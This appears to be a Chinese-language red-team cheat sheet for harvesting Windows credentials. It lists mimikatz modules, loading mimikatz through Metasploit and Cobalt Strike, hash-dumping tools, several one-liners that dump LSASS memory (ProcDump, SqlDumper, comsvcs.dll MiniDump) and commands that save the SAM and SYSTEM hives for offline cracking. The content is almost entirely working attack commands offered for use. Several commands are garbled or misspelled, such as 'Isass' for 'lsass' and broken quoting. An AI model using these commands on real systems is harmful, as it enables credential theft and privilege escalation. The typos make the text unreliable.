0x01、基本用法:
CRYPTO::Certificates -列出/导出凭证。
PRIVILEGE::Debug -获得Debug权限
SEKURLSA::LogonPasswords -列出所有可用的提供者的凭据
TOKEN:List -列出系统中的所有令牌。
TOKEN::Elevate -假冒令牌。用于提升权限至SYSTEM权限(默认情况下)
0x02、加载方法
msf
load mimikatz //加载mimikatz
wdigest //列出所有可用的账号密码(与以下三个命令一样)
tspkg
msv
mimikatz_command -f sekursa::logonPasswords
cs
加载并运行mimikatz:Access——>run mimikatz
抓取密码hash值:Access——>hashdump
0x03、hash抓取
QuarksPwDump
QuarksPwDump.exe -ump-hash-local
wce
wce.exe
wce.exe -W
pwdump7
LaZagne
laZagne_x86.exe windows
SharpDump
for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq Isass.exe" /NH') do SharpDump.exe %i
mimikatz.exe"sekurlsa::minidump Isass.dmp" sekurlsal::logonPasswords full" "exit"
ProcDump
Procdump.exe -accepteula -ma Isass.exe Isass.dmp
sqldump
for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq Isass.exe" /NH') do Sqldumper.exe %i 0 0x01100
rundll32
for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq Isass.exe" /NH') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump %i .\lsass.dmp full
关于SAM数据库
reg save hklm\sam .\sam.hive && save hklm\system .\system.hive
lsadump:sam /sam:sam.hiv /system:system.hiv